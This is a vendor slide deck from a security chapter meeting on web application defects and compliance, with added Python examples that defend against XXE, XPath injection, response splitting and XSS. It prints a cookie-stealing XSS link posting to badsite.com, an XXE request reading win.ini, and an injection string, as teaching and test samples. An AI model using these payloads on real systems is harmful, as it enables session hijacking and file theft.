ISSA Delaware Valley Chapter Meeting
Achieving Enterprise Security through Collaboration

Steve Orrin, CTO, Sanctum Inc.


Recent News

• Man admits hacking into NY Times (MSNBC, Jan 8, 2004)
• Hackers attack eBay accounts (ZDNet News, Mar 25, 2002)
• CA State Agency warns of Security Breach (CNET News, Feb 13, 2004)
• Sites Revealed Passwords For Thousands Of Ameritech Users (NewsBytes, Feb 22, 2002)
• US Port hit by UK Hacker (BBC, Oct 6, 2003)
• FBI investigates hack at e-voting software company (News.com, Dec 30, 2003)
• Glitch at Fidelity Canada exposes customer information (ComputerWorld, May 30, 2002)
• Hacker Accesses 2.2 Million Credit Cards (CNN, Feb 18, 2003)
• Hacker steals 13,000 credit card numbers from US Navy (Washington Post, Aug 23, 2003)
• NASA Sites Hacked (ComputerWorld, Dec 17, 2003)
• Hackers get Acxiom Customer Information (ComputerWorld, Aug 9, 2003)
• FTD.com hole leaks personal information (CNet, Feb 13, 2003)
• FTC investigates PetCo.com security holes (SecurityFocus, Dec 5, 2003)

Impact of Security Defects

Bad Business
• On average, there are 5 to 15 defects in every 1,000 lines of code (US Dept. of Defense and the Software Engineering Institute)

Slow Business
• It takes 75 minutes on average to track down one defect. Fixing one of these defects takes 2 to 9 hours each (5 Year Pentagon Study)
• Researching each of the 4,200 vulnerabilities published by CERT last year for 10 minutes would have required 1 staffer to research for 17.5 full workweeks or 700 hours (Intel White paper, CERT, ICSA Labs)

Loss of Business
• A company with 1,000 servers can spend $300,000 to test & deploy a patch; most companies deploy several patches a week (Gartner Group)

Pressures on the Application Lifecycle Increasing

Time-to-Market
• Bringing new applications to market quickly

Complexity is Growing
• Increased application lifecycle complexity

Increasing Business Risks Driven by Security Defects
• Rise in hacker activity
• Government scrutiny and regulation pressures (HIPAA, GLBA, SB1386, etc.)
• Liability precedents for security defects

Costs Escalate Dramatically the Longer You Wait to Find and Fix
• Bad software costs the economy $59.5 billion a year in breakdowns and repairs (Nat. Institute of Standards & Technology, May 2002)

[Lifecycle diagram: 1. Develop, 2. Test, 3. Audit, 4. Operate]

Why Application Security Defects Matter

Frequent
• 3 out of 4 business websites are vulnerable to attack (Gartner)

Pervasive
• 75% of hacks occur at the application level (Gartner)

Undetected
• QA testing tools are not designed to detect security defects in applications
• Manual patching is reactive, never ending, time consuming & expensive

Dangerous
• When exploited, security defects destroy company value and customer trust

More than 2,000 application 'Healthchecks' with AppScan: 98% vulnerable, and all had firewalls and encryption solutions in place...

[Chart: breakdown of exposures found]
• 32% Hijack Session / Identity Theft
• 27% Privacy Breach
• 21% Full Control and Access to Information
• 11% e-Shoplifting
• 7% Modify Information
• 2% Delete Web Site

Business Impact of Application Hacks

Through a browser, a hacker can use even the smallest bug or backdoor to accomplish identity theft, fraud, denial of service and to obtain and manipulate customer and consultant records, misdirect customers to a bogus site, or change parameters (i.e. total contribution > 100%).

Application Threat / Negative Impact / Example Business Impact
• Buffer overflow: Denial of Service (DoS); site unavailable to customers
• Cookie poisoning: Session hijacking; cash out someone else's account
• Hidden fields: Alter site, illegal transactions; change hidden fields, i.e. account balance
• Debug options: Admin access; access to all accounts and information
• Cross Site Scripting: Identity theft; allows intruder transfer of funds
• Stealth Commanding: Access O/S and application; get list of customer accounts
• Parameter Tampering: Fraud, data theft; alter distributions and transfer accounts
• Forceful Browsing / SQL Injection: Unauthorized site/data access; administrative privileges to database with read/write access
• 3rd Party Misconfiguration: Admin access; create new unauthorized database of customers
• Published Vulnerabilities: Admin access, DoS; create new unauthorized account

Legislation: Validation and Reporting Required

• GLBA: mandatory privacy and security standards in the financial services industry (and enforced by the FTC)
• HIPAA: mandatory privacy and security standards in the healthcare industry
• FERC: mandatory privacy and security standards in the energy industry
• SB1386: California law requires companies to warn consumers when personal information may have been stolen
• Sarbanes-Oxley: mandatory auditing controls requiring the CEO/CFO to certify that adequate "internal control" safeguards are in place
• Putnam Bill (still in debate): mandatory security audits

Identity theft complaints come to the FTC at more than 13,000/month.

Government and Industry Regulations Impact Matrix on Internet Security
[Matrix: regulations (Sarbanes-Oxley Act of 2002, HIPAA, California SB 1386, USA Patriot Act, Gramm-Leach-Bliley Act) against industries (Financial Services, Insurance, Banking, Healthcare, Pharmaceutical, Gov't). Yellow = Minor Impact, Orange = Medium Impact, Red = Major Impact. Source: IDC, 2003 (modified)]

Example: Cross Site Scripting

• Vulnerability explanation: Extremely common. A flaw in the server's web page leads to a compromise in a client. A third party creates a link (or sends an email) whose URL contains a parameter with a script; once the user connects, the site runs this script.
• Why Cross Site Scripting: Many parameters are embedded within the HTML of following responses without checking their content for scripts.
• As a result of this manipulation: "Virtual hijacking" of the session. Any information flowing between the legitimate user and the site can be manipulated or transmitted to the evil 3rd party. The fault is simply echoing user input (trusting user input!).

CSS In Action

welcome.asp echoes the name parameter straight into the page:

Hello, <%= Request.QueryString("name") %>

The attacker owns badsite.com and distributes a link to the vulnerable page:

<a href=http://www.insecuresite.com/welcome.asp?name=<FORM action=http://www.badsite.com/data.asp method=post id="idForm"><INPUT name="cookie" type="hidden"></FORM><SCRIPT>idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>>here</a>

Web Services Threats

XML/Web Services Attack Vectors

• Old attacks still valid
– CWVs
– Injection attacks
– Buffer overflow
– Denial of service

• The new manipulation attacks
– Entity and referral attacks
– DTD and schema attacks

• The next generation attacks
– Web service enabled application attacks
– Multi-phase attacks

Examples:
• Command injection SOAP attacks
• SQL injection in XQuery
• Cross-site scripting in client side XML documents
• SAP/BAPI attacks via SOAP
• Entity expansion attacks
• Endless loop denial of service attacks
• Schema redirection attacks
• XPath injection

XML Attack Example (Entity Expansion)

An attack on XXX Application Server:

1. Find a web service which echoes back user data, such as the parameter "in"

2. Use the following SOAP request:

...<!DOCTYPE root [
<!ENTITY foo SYSTEM "file:///c:/winnt/win.ini">]>...<in>&foo;</in>

3. And you'll get C:\WinNT\Win.ini in the response (!!!)

How it works:
A. XXX App Server expands the entity "foo" into full text, gotten from the entity definition URL; the actual attack takes place at this phase (by XXX Application Server itself)
B. XXX App Server feeds the input to the web service
C. The web service echoes back the data
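The defence against the request above sits in front of the web service, in how the XML is parsed. The following is an added example (not from the slides and not Sanctum code) of a Python receiver for the echoing service: it refuses any inline DTD, which blocks both SYSTEM entities and recursive entity expansion, and additionally configures xml.sax to never resolve external entities even if a DTD were accepted. The SOAP envelopes are constructed samples; the element name "in" is the one from the slide. Recent CPython releases already leave external general entities unresolved by default, but the example sets the features explicitly rather than relying on that.

```python
import io
import re
from typing import List
import xml.sax
from xml.sax.handler import (
    ContentHandler,
    EntityResolver,
    feature_external_ges,
    feature_external_pes,
)


class UnsafeXML(ValueError):
    """Raised when untrusted XML carries a DTD or an entity we will not resolve."""


# A SOAP request from an untrusted caller has no legitimate need to declare
# entities, so any <!DOCTYPE ...> is rejected before parsing. This stops
# SYSTEM entities (file/URL disclosure) and nested entity expansion (DoS).
_DOCTYPE_RE = re.compile(rb"<!DOCTYPE", re.IGNORECASE)


class _RefusingResolver(EntityResolver):
    """Belt and braces: if a resolver is ever consulted, fail closed."""

    def resolveEntity(self, publicId, systemId):
        raise UnsafeXML(f"refusing to resolve external entity {systemId!r}")


class _InHandler(ContentHandler):
    """Collects the text of every <in> element (the echoed parameter)."""

    def __init__(self):
        super().__init__()
        self.values: List[str] = []
        self._buf = None

    def startElement(self, name, attrs):
        if name == "in":
            self._buf = []

    def characters(self, content):
        if self._buf is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == "in" and self._buf is not None:
            self.values.append("".join(self._buf))
            self._buf = None


def parse_untrusted(data: bytes) -> List[str]:
    """Return the <in> values of a request, or raise UnsafeXML."""
    if _DOCTYPE_RE.search(data):
        raise UnsafeXML("inline DTD not accepted from untrusted callers")
    parser = xml.sax.make_parser()
    parser.setFeature(feature_external_ges, False)   # no external general entities
    parser.setFeature(feature_external_pes, False)   # no external parameter entities
    parser.setEntityResolver(_RefusingResolver())
    handler = _InHandler()
    parser.setContentHandler(handler)
    parser.parse(io.BytesIO(data))
    return handler.values


# Constructed sample requests (not from the slides) for trying the guard.
BENIGN_SOAP = b"""<?xml version="1.0"?>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><echo><in>hello world</in></echo></soap:Body>
</soap:Envelope>"""

# The slide's entity-expansion request, wrapped in a constructed envelope.
XXE_SOAP = b"""<?xml version="1.0"?>
<!DOCTYPE root [ <!ENTITY foo SYSTEM "file:///c:/winnt/win.ini"> ]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body><echo><in>&foo;</in></echo></soap:Body>
</soap:Envelope>"""


if __name__ == "__main__":
    print(parse_untrusted(BENIGN_SOAP))
    try:
        parse_untrusted(XXE_SOAP)
    except UnsafeXML as exc:
        print("rejected:", exc)
```

The DOCTYPE check is deliberately a byte-level test done before any XML machinery runs, so a parser bug cannot be reached by a crafted prologue; the parser features are the second layer for environments that must accept some DTDs.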

Next Generation Attacks: XPath Injection

• Query based injection attack targeting Web applications using XML data sources (XML documents and XML databases)
• Why XPath Injection?
– Traditional query injection: ' or 1=1 or ''='
– XPath blindfolded injection
• The attacker extracts information per single query injection. The novelty is:
– No prior knowledge of the XPath query format is required (unlike "traditional" SQL injection attacks)
– The whole XML document is eventually extracted, regardless of the XPath query format used by the application
• Defending against XPath injection (similar to defending against SQL injection):
– The application must sanitize/validate user input
– Use an application firewall in front of the web site
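XPath 1.0 has no parameterised queries, so "sanitize/validate user input" is the whole defence on the application side. The following added example (not from the slides) shows the two pieces in Python: an allowlist that rejects anything outside the expected shape of a user name, and a literal-quoting helper for cases where a value containing quotes must still be embedded in a query. The users document and the name pattern are constructed assumptions; the stdlib ElementTree XPath subset is used for the lookup (it does not understand concat(), which the helper emits only for values holding both quote characters, so that form is for full XPath 1.0 engines).

```python
import re
from typing import Optional
import xml.etree.ElementTree as ET

# Constructed sample "XML database" of users (assumption, not from the slides).
USERS_XML = """<users>
  <user name="alice" role="user"/>
  <user name="bob" role="admin"/>
</users>"""
USERS = ET.fromstring(USERS_XML)

# Allowlist for a user name: letters, digits and a few separators, 1-32 chars.
# Quotes, spaces and parentheses (everything an injected predicate needs) are out.
NAME_RE = re.compile(r"^[A-Za-z0-9_.-]{1,32}$")


def xpath_literal(value: str) -> str:
    """Quote an arbitrary string as an XPath 1.0 string literal.

    XPath has no escape character. A value without single quotes is wrapped
    in them; one without double quotes is wrapped in those; a value holding
    both is split into a concat() of safely quoted pieces.
    """
    if "'" not in value:
        return f"'{value}'"
    if '"' not in value:
        return f'"{value}"'
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join(f"'{p}'" for p in parts) + ")"


def find_role(root: ET.Element, name: str) -> Optional[str]:
    """Look up a user's role: validate first, then build the query with a
    properly quoted literal instead of string concatenation."""
    if not NAME_RE.fullmatch(name):
        # Reject everything else: the injected predicate never reaches XPath.
        raise ValueError("invalid user name")
    node = root.find(f".//user[@name={xpath_literal(name)}]")
    return None if node is None else node.get("role")


if __name__ == "__main__":
    print(find_role(USERS, "bob"))          # admin
    print(find_role(USERS, "carol"))        # None
    try:
        # The "traditional" injection string from the slide is rejected outright.
        find_role(USERS, "' or 1=1 or ''='")
    except ValueError as exc:
        print("rejected:", exc)
```

The order matters: validation removes the injection characters entirely, and the literal quoting protects the cases (display names, free text) where the allowlist has to be looser than this one.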

Next Generation Attacks: HTTP Response Splitting

• A new carrier affecting Web server communications to perform old attacks in a more elegant and malicious way...
• Hackers can easily and with greater immunity perform the following attacks:
– Web cache poisoning (new type of attack)
  • poisoning the reverse proxy cache: defacement
  • poisoning an intermediate cache server: next generation phishing
  • poisoning a browser cache: targeted attack
– Hijacking a page (HTTP response) with user sensitive information
  • diverts a response intended for a client to the attacker
– Cross-site scripting (XSS)
  • a new way to implement XSS with the above mentioned added 'benefits'

Anti-Forensics Properties: A step toward the "perfect hack"!

• Easily reversible, manually by the attacker and as part of normal cache operations
– The nature of the attack hampers incident response activities
– Allows for removal of evidence
– Allows the attacker to more easily cloak the evidence of attack
– Web caching is rarely logged
• End result: a novice cracker can hack with a level of impunity once reserved for the very skilled

How it works

• Normal request/response scenario: the user sends a request to a Web server/application; the Web server/application processes the request and sends a response
• Attack scenario 1: attack request (normal request with embedded attack) with 2 responses
– Attacker sends the attack request to a Web server/application
– Web server/application processes the request
– When the Web server interprets the response from the application, the attack 'tricks' the Web server into breaking the response and sending a second response (the embedded attack response)
– The attack response is sent to the user/cache
• Root cause: poor user input validation
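Because the root cause is input validation, the fix lives where user data meets a response header. The following added example (not from the slides) contrasts a naive redirect that drops a user-supplied target straight into a Location header with a small Response builder that refuses any header name that is not an HTTP token and any header value containing CR, LF or other control characters. The redirect target and the "second response" payload are constructed samples; count_responses shows how many responses a proxy or cache would see in the resulting byte stream.

```python
import re

# Header field name must be an RFC 7230 token; values may not contain CTLs.
_TOKEN_RE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")
_CTL_RE = re.compile(r"[\x00-\x1f\x7f]")


class HeaderInjection(ValueError):
    """Raised when a header would break the response into two."""


def naive_redirect(location: str) -> bytes:
    """The vulnerable pattern: a user-controlled value copied into a header unchecked."""
    return (
        f"HTTP/1.1 302 Found\r\nLocation: {location}\r\nContent-Length: 0\r\n\r\n"
    ).encode("latin-1")


class Response:
    """Minimal response builder that validates every header it emits."""

    def __init__(self, status: int = 200, reason: str = "OK"):
        self.status = status
        self.reason = reason
        self.headers = []
        self.body = b""

    def add_header(self, name: str, value: str) -> None:
        if not _TOKEN_RE.match(name):
            raise HeaderInjection(f"bad header name {name!r}")
        if _CTL_RE.search(value):
            # CR/LF here is exactly what splits one response into two.
            raise HeaderInjection(f"control character in value of {name}")
        self.headers.append((name, value))

    def redirect(self, location: str) -> None:
        """Redirect to a target that may come from user input."""
        self.status, self.reason = 302, "Found"
        self.add_header("Location", location)

    def serialize(self) -> bytes:
        lines = [f"HTTP/1.1 {self.status} {self.reason}"]
        lines += [f"{name}: {value}" for name, value in self.headers]
        lines.append(f"Content-Length: {len(self.body)}")
        return ("\r\n".join(lines) + "\r\n\r\n").encode("latin-1") + self.body


def count_responses(raw: bytes) -> int:
    """How many HTTP responses a proxy or cache would parse out of this stream."""
    return len(re.findall(rb"(?m)^HTTP/1\.[01] \d{3}", raw))


# Constructed sample: a redirect target carrying an embedded second response.
SPLIT_TARGET = "/home\r\n\r\nHTTP/1.1 200 OK\r\nContent-Length: 0\r\n\r\n"


if __name__ == "__main__":
    print(count_responses(naive_redirect(SPLIT_TARGET)))   # 2: the cache sees two responses
    try:
        Response().redirect(SPLIT_TARGET)
    except HeaderInjection as exc:
        print("rejected:", exc)
    r = Response()
    r.redirect("/home")
    print(count_responses(r.serialize()))                  # 1
```

Validate after any URL-decoding the framework performs, since "%0d%0a" only becomes a line break once decoded; and apply the same check to every header derived from input (Set-Cookie, Location, custom headers), not only redirects.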

The Heart of the Issue: Input Trust

• "All input is evil, until proven otherwise!"
– The root of most serious vulnerabilities:
  • Buffer overruns
  • Canonicalization issues
  • Cross-site scripting (XSS) attacks
  • SQL injection attacks
  • Integer overflow attacks
• Good guys give you well-formed data, bad guys don't!
• Don't rely on your client application providing clean data
– Don't assume attackers play by the rules
– They go 'under the radar'

Input Remedies

• Require authenticated connections
• Sanitize all input from untrusted sources
– Look for valid data
– Reject everything else
– High-level languages can use RegExp, e.g. SSN = ^\d{3}-\d{2}-\d{4}$
• Make no assumptions about the trustworthiness of data
• Never directly echo Web-based user input
– Verify input, then echo it
– At the very least, HTML or URL encode the output
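The remedies above and the welcome.asp example from the Cross Site Scripting slides fit together in one routine: validate against an allowlist, then encode on output for the context the value lands in. The following added Python example (not from the slides and not Sanctum code) does both. The SSN pattern is the one given above; the name and account patterns, and the validate/welcome/link helpers, are assumptions for this example. The payload used to exercise it is the FORM/SCRIPT fragment from the CSS In Action slide.

```python
import html
import re
from urllib.parse import quote

# Allowlist patterns: "look for valid data, reject everything else".
VALIDATORS = {
    "ssn": re.compile(r"^\d{3}-\d{2}-\d{4}$"),          # pattern from the slide
    "name": re.compile(r"^[A-Za-z][A-Za-z' -]{0,39}$"),  # assumption for this example
    "account": re.compile(r"^[0-9]{6,12}$"),             # assumption for this example
}


def validate(kind: str, value: str) -> str:
    """Return the value unchanged if it matches the allowlist, else raise."""
    if not VALIDATORS[kind].fullmatch(value):
        raise ValueError(f"rejected {kind} input")
    return value


def welcome_vulnerable(name: str) -> str:
    """Equivalent of the slide's welcome.asp: echoes the parameter untouched."""
    return f"Hello, {name}"


def welcome_hardened(name: str) -> str:
    """Verify input, then echo it; still HTML-encode after validation."""
    return "Hello, " + html.escape(validate("name", name), quote=True)


def echo_encoded(value: str) -> str:
    """'At the very least, HTML encode the output': the fallback when the
    field is free text and an allowlist cannot be tight."""
    return html.escape(value, quote=True)


def link_hardened(name: str) -> str:
    """When the value lands in a URL rather than in HTML text, URL-encode it."""
    return "http://www.insecuresite.com/welcome.asp?name=" + quote(name, safe="")


# The script payload from the CSS In Action slide.
PAYLOAD = (
    '<FORM action=http://www.badsite.com/data.asp method=post id="idForm">'
    '<INPUT name="cookie" type="hidden"></FORM>'
    "<SCRIPT>idForm.cookie.value=document.cookie; idForm.submit();</SCRIPT>"
)


if __name__ == "__main__":
    print(welcome_vulnerable(PAYLOAD)[:40], "...")   # script reaches the browser
    try:
        welcome_hardened(PAYLOAD)
    except ValueError as exc:
        print("rejected:", exc)                       # allowlist stops it
    print(echo_encoded(PAYLOAD)[:40], "...")          # rendered as text, not markup
    print(welcome_hardened("O'Brien"))
    print(link_hardened("a b&c"))
```

Encoding is per destination: HTML body text, an attribute, a URL parameter and a JavaScript string each need a different encoder, which is why validation comes first and encoding is the last line rather than the only one.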

Introducing Risk Early: The Vicious Cycle

Design, Develop & Test (Staging)
• Responsibilities: develop high quality secure apps
• Tools: IDEs; performance & functionality QA tools; manual test scripts and code review; freeware
• Challenges: don't have the tools, time or training for security testing
• Result: dangerous security defects passed downstream to operations; code comes back to development to work on again...

Deployment & Operations (Production)
• Responsibilities: audit apps before/after deployment; patch & fix; communicate to development
• Tools: network scanners; vulnerability assessment tools
• Challenges: ran out of time! Being measured on deployment, not on sending back to development
• Results: kept waiting for quality software to deploy; anxious about overall software quality deployed and the next attack...

Development is fertile ground for security bugs...

Ops, Admins, & Auditors are expensive exterminators...

Automated Security Testing for the Application Lifecycle

Develop (Developer):
• Construct application
• Unit test application components

Test (Tester / QA Engineer):
• Create test plan
• Create, run & manage test scripts
• Defect assignment & tracking
• Delta, trend and results analysis
• Approve release to production

Audit (Ops & Security Auditor):
• Create operations plan
• Deploy & maintain business compliance
• Scheduled (or not!) application audits

Financial Impact

Cost to fix dramatically increases the longer you wait to test.

[Chart: Cost of Backlog, statistics from 10 F100 companies; y-axis "Percent of Applications", 0 to 100]
1. 92% of applications fail security testing; 8% pass
2. On retest, 80% pass; 20% fail
3. Of that 20%, half pass and half never pass
= 2.5 month avg. delay, > $25M in lost savings/revenue

The Bottom Line

Costs of defects introduced early in the lifecycle quickly add up

• Untested applications in production

• Longer development cycles

• More development cycles

• Considerable business risks

Understand, Communicate, Measure

• Understand your exposure
– Use tools that scan for exposure points at the web server and application layers as part of the application development process
– The data collected must be relevant to the audience receiving it
– The importance of terminology and types of data provided
• Communicate the exposures (security defects)
– Various stakeholders in the development lifecycle need different types of data
– Use the tracking tools already in place
– Map security defects to business needs
• Measure your assessment process / security defect remediation
– Analyze exposure from individual assessments and compare results across the cycle

Understand

Communicate: Developers/QA... the right data for the right audience

Communicate: Prod Mgmt... the right data for the right audience

Communicate: Auditors... the right data for the right audience

Measure: Trend Analysis

From Vicious to Virtuous Development Cycle

Give developers, QA and administrators the tools and training they need to succeed!

The Result: Address Compliance

Application Threat Impacts GLBA / HIPAA

Application threats addressed by security testing: buffer overflow, cookie poisoning, hidden fields, debug options, Cross Site Scripting, Stealth Commanding, Parameter Tampering, forceful browsing / SQL injection, 3rd party misconfiguration, published vulnerabilities.

GLBA/HIPAA mandate security testing that addresses:
• Ensure the security & confidentiality of customer records and information
• Protect against any unanticipated threat or hazard to the security or integrity of these records
• Protect against unauthorized access that could result in substantial harm or inconvenience to customers

Network devices do not detect these vulnerabilities.

The Result: Address Compliance

Application Threat Impacts SB 1386

Application threats addressed by security testing: buffer overflow, cookie poisoning, hidden fields, debug options, Cross Site Scripting, Stealth Commanding, Parameter Tampering, forceful browsing / SQL injection, 3rd party misconfiguration, published vulnerabilities.

SB 1386 mandates security testing that addresses:
• Prevent unauthorized access to California customers' or employees' personal information
• Penalty of breach: each customer/employee must be individually notified in writing of the breach in confidentiality in less than two weeks
• Otherwise, a public announcement to the press must occur

Automated Web Application Testing and Risk Assessment

S.A.F.E.: Speed, Accuracy, Flexibility and Efficiency

Site Smart for QA and Audit:
• Seamlessly integrates into any QA or audit environment
• Tests both new and existing Internet infrastructures
• Ensures compliance with security best practices and external regulations

Application Lifecycle Security accelerates ROI:
• increased revenue
• increased customer satisfaction
• decreased customer acquisition and retention costs

Application Lifecycle Security to increase the speed and ease of application deployment in a secure environment

Application Security Across the Lifecycle

• Incorporate security into the process, early on and at each stage
• Document and report: demonstrate compliance
• Improve overall result
• Reduce costs

[Lifecycle diagram]
1. Develop (AppScan DE): RELIABILITY, create 'hacker resistant' applications
2. Test (AppScan QA): ASSURANCE, test application quality
3. Audit (AppScan Audit): VALIDATION, audit for security and compliance
4. Operate (AppShield): CONFIDENCE, maintain application integrity and user confidence

Q&A

Steve Orrin, CTO, Sanctum, Inc.

[email protected]

For More Information:

Sanctum, Inc

[email protected]

Toll free: (877) 888-3970